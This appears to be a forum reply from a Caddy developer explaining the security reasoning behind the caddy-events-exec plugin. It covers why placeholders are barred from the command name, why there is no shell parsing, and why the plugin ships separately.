Thanks for the info, I don’t know much about dbus, so that sounds pretty interesting. It’d probably make a good Caddy plugin for starters!
Fair point. I blame the distros / package managers for not being capable of doing what is needed to provide secure, statically linked binaries. So, this is unfortunate, indeed.
I honestly don’t know what security concerns the caddy-events-exec plugin has. We are just not including it out of an abundance of caution and because we don’t know enough people’s requirements or use cases yet. If the plugin turns out to be popular, we may merge it in.
Go is memory-safe, so you can’t just overflow a buffer and access arbitrary memory or run commands. I’m definitely not worried about that. My bigger concern over “arbitrary commands” is the user’s configuration: how easily can they configure an insecure server?
For example, if we allowed placeholders to be used where the command is specified, then it might definitely be possible for other entities to cause a value of a placeholder to be something other than what was intended, maybe via some sort of injection attack. I dunno. It’s purely speculative, but that’s why I didn’t implement placeholder support for the command to be run. (Placeholders are supported for arguments, just not the command itself.) You could imagine the damage that could be done if an arbitrary curl command was executable, for example.
Similarly, we don’t do any special parsing of the command. No shell expansion, no shell-like parsing. (Only placeholders on the arguments are allowed. But no bash syntax, for example.) You have to give the command and argument, one per token, pretty basic. This prevents weird results of parsing leading to running commands that aren’t expected.
Even with this, I could imagine a curl command being run with an argument that’s expanded from placeholders into something the user doesn’t expect, leading to curl making a request to some arbitrary endpoint…
So really, it’s more of a “here’s a separate plugin so you can shoot yourself in the foot unless you know what you’re doing” – and we’re not ready to bundle that kind of thing into the standard distribution until we understand the userscape better.
But I don’t know of any innate security vulnerabilities. I don’t think you need to be scared of it as long as you don’t create an abusable configuration.